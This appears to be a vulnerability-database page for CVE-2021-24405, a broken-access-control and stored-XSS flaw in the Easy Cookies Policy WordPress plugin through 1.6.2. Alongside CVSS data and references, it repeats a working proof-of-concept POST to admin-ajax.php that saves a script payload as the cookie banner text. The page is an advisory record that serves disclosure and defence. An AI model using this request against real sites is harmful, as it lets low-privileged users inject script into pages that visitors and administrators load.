Description
The Easy Cookies Policy WordPress plugin through 1.6.2 is lacking any capability and CSRF check when saving its settings, allowing any authenticated users (such as subscriber) to change them. If users can't register, this can be done through CSRF. Furthermore, the cookie banner setting is not sanitised or validated before being output in all pages of the frontend and the backend settings one, leading to a Stored Cross-Site Scripting issue.
Affected Software
Related
{"id": "CVE-2021-24405", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24405", "description": "The Easy Cookies Policy WordPress plugin through 1.6.2 is lacking any capability and CSRF check when saving its settings, allowing any authenticated users (such as subscriber) to change them. If users can't register, this can be done through CSRF. Furthermore, the cookie banner setting is not sanitised or validated before being output in all pages of the frontend and the backend settings one, leading to a Stored Cross-Site Scripting issue.", "published": "2021-07-06T11:15:00", "modified": "2022-06-16T19:30:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.0}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24405", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/9157d6d2-4bda-4fcd-8192-363a63a51ff5", "http://packetstormsecurity.com/files/166543/WordPress-Easy-Cookie-Policy-1.6.2-Cross-Site-Scripting.html"], "cvelist": ["CVE-2021-24405"], "immutableFields": [], "lastseen": "2022-06-17T16:31:58", "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5"]}], "rev": 4}, "score": {"value": 2.0, "vector": "NONE"}, "twitter": {"counter": 3, "tweets": [{"link": "https://twitter.com/threatintelctr/status/1413521049640124422", "text": " NEW: CVE-2021-24405 The Easy Cookies Policy WordPress plugin through 1.6.2 is lacking any capability and CSRF check when saving its settings, allowing any authenticated users (such as subscriber) to change them... (click for more) Severity: MEDIUM https://t.co/hrX8ihB617?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1537521208492695553", "text": " NEW: CVE-2021-24405 The Easy Cookies Policy WordPress plugin through 1.6.2 is lacking any capability and CSRF check when saving its settings, allowing any authenticated users (such as subscriber) to change them... (click for more) Severity: MEDIUM https://t.co/hrX8ihB617", "author": "threatintelctr", "author_photo": "https://pbs.twimg.com/profile_images/904224973987840000/dMy1x9Ho_400x400.jpg"}]}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5"]}]}, "exploitation": null, "vulnersScore": 2.0}, "_state": {"dependencies": 0, "twitter": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:izsoft:easy_cookies_policy:1.6.2"], "cpe23": ["cpe:2.3:a:izsoft:easy_cookies_policy:1.6.2:*:*:*:*:wordpress:*:*"], "cwe": ["CWE-863"], "affectedSoftware": [{"cpeName": "izsoft:easy_cookies_policy", "version": "1.6.2", "operator": "le", "name": "izsoft easy cookies policy"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:izsoft:easy_cookies_policy:1.6.2:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.6.2", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/9157d6d2-4bda-4fcd-8192-363a63a51ff5", "name": "https://wpscan.com/vulnerability/9157d6d2-4bda-4fcd-8192-363a63a51ff5", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/166543/WordPress-Easy-Cookie-Policy-1.6.2-Cross-Site-Scripting.html", "name": "http://packetstormsecurity.com/files/166543/WordPress-Easy-Cookie-Policy-1.6.2-Cross-Site-Scripting.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"zdt": [{"lastseen": "2022-03-30T07:49:08", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-30T00:00:00", "type": "zdt", "title": "WordPress Easy Cookie Policy 1.6.2 Plugin - Broken Access Control to Stored XSS Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24405"], "modified": "2022-03-30T00:00:00", "id": "1337DAY-ID-37546", "href": "https://0day.today/exploit/description/37546", "sourceData": "# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS\n# Author: 0xB9\n# Software Link: https://wordpress.org/plugins/easy-cookies-policy/\n# Version: 1.6.2\n# Tested on: Windows 10\n# CVE: CVE-2021-24405\n\n1. Description:\nBroken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php.\nIf users can't register, this can be done through CSRF.\n\n2. Proof of Concept:\nPOST http://localhost/wp-admin/admin-ajax.php HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nReferer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 226\nOrigin: http://localhost\nConnection: keep-alive\nHost: localhost\nCookie: [Any authenticated user]\n\naction=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd\n", "sourceHref": "https://0day.today/exploit/37546", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2022-03-30T15:13:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-30T00:00:00", "type": "packetstorm", "title": "WordPress Easy Cookie Policy 1.6.2 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24405"], "modified": "2022-03-30T00:00:00", "id": "PACKETSTORM:166543", "href": "https://packetstormsecurity.com/files/166543/WordPress-Easy-Cookie-Policy-1.6.2-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS \n# Date: 2/27/2021 \n# Author: 0xB9 \n# Software Link: https://wordpress.org/plugins/easy-cookies-policy/ \n# Version: 1.6.2 \n# Tested on: Windows 10 \n# CVE: CVE-2021-24405 \n \n1. Description: \nBroken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php. \nIf users can't register, this can be done through CSRF. \n \n2. Proof of Concept: \nPOST http://localhost/wp-admin/admin-ajax.php HTTP/1.1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 \nAccept: application/json, text/javascript, /; q=0.01 \nAccept-Language: en-US,en;q=0.5 \nReferer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 226 \nOrigin: http://localhost \nConnection: keep-alive \nHost: localhost \nCookie: [Any authenticated user] \n \naction=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd \n \n`\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/166543/wpecp162-xss.txt"}], "wpvulndb": [{"lastseen": "2021-09-14T23:15:46", "description": "The plugin is lacking any capability and CSRF check when saving it's settings, allowing any authenticated users (such as subscriber) to change them. If users can't register, this can be done through CSRF. Furthermore, the cookie banner setting is not sanitised or validated before being output in all pages of the frontend and the backend settings one, leading to a Stored Cross-Site Scripting issue.\n\n### PoC\n\nPOST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 226 Connection: keep-alive Cookie: [Any authenticated user / via CSRF] action=easy_cookies_policy_save_settings&maintext;=&background;=black&transparency;=90&close;=accept&expires;=365&enabled;=true&display;=fixed&position;=top&button;_text=Accept&text;_color=#dddddd\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-11T00:00:00", "type": "wpvulndb", "title": "Easy Cookie Policy <= 1.6.2 - Broken Access Control to Stored Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24405"], "modified": "2021-06-25T07:10:33", "id": "WPVDB-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5", "href": "https://wpscan.com/vulnerability/9157d6d2-4bda-4fcd-8192-363a63a51ff5", "sourceData": "", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2021-09-14T23:15:46", "description": "The plugin is lacking any capability and CSRF check when saving it's settings, allowing any authenticated users (such as subscriber) to change them. If users can't register, this can be done through CSRF. Furthermore, the cookie banner setting is not sanitised or validated before being output in all pages of the frontend and the backend settings one, leading to a Stored Cross-Site Scripting issue.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-11T00:00:00", "type": "wpexploit", "title": "Easy Cookie Policy <= 1.6.2 - Broken Access Control to Stored Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24405"], "modified": "2021-06-25T07:10:33", "id": "WPEX-ID:9157D6D2-4BDA-4FCD-8192-363A63A51FF5", "href": "", "sourceData": "POST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: application/json, text/javascript, /; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 226\r\nConnection: keep-alive\r\nCookie: [Any authenticated user / via CSRF]\r\n\r\naction=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:31:58", "description": "Broken Access Control vulnerability leading to Stored Cross-Site Scripting (XSS) discovered by 0xB9 in WordPress Easy Cookies Policy plugin (versions <= 1.6.2).\n\n## Solution\n\n\r\n This plugin has been closed as of April 28, 2021 and is not available for download. This closure is temporary, pending a full review.\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-11T00:00:00", "type": "patchstack", "title": "WordPress Easy Cookies Policy plugin <= 1.6.2 - Broken Access Control vulnerability leading to Stored Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24405"], "modified": "2021-06-11T00:00:00", "id": "PATCHSTACK:18DF57CE08A5AF8EE1A759956DD2DDD5", "href": "https://patchstack.com/database/vulnerability/easy-cookies-policy/wordpress-easy-cookies-policy-plugin-1-6-2-broken-access-control-vulnerability-leading-to-stored-cross-site-scripting-xss", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2022-03-30T09:29:12", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-30T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24405", "CVE-2021-24405"], "modified": "2022-03-30T00:00:00", "id": "EDB-ID:50849", "href": "https://www.exploit-db.com/exploits/50849", "sourceData": "# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS\r\n# Date: 2/27/2021\r\n# Author: 0xB9\r\n# Software Link: https://wordpress.org/plugins/easy-cookies-policy/\r\n# Version: 1.6.2\r\n# Tested on: Windows 10\r\n# CVE: CVE-2021-24405\r\n\r\n1. Description:\r\nBroken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php.\r\nIf users can't register, this can be done through CSRF.\r\n\r\n2. Proof of Concept:\r\nPOST http://localhost/wp-admin/admin-ajax.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\r\nAccept: application/json, text/javascript, /; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 226\r\nOrigin: http://localhost\r\nConnection: keep-alive\r\nHost: localhost\r\nCookie: [Any authenticated user]\r\n\r\naction=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd", "sourceHref": "https://www.exploit-db.com/download/50849", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}]}
CVE-2021-24405
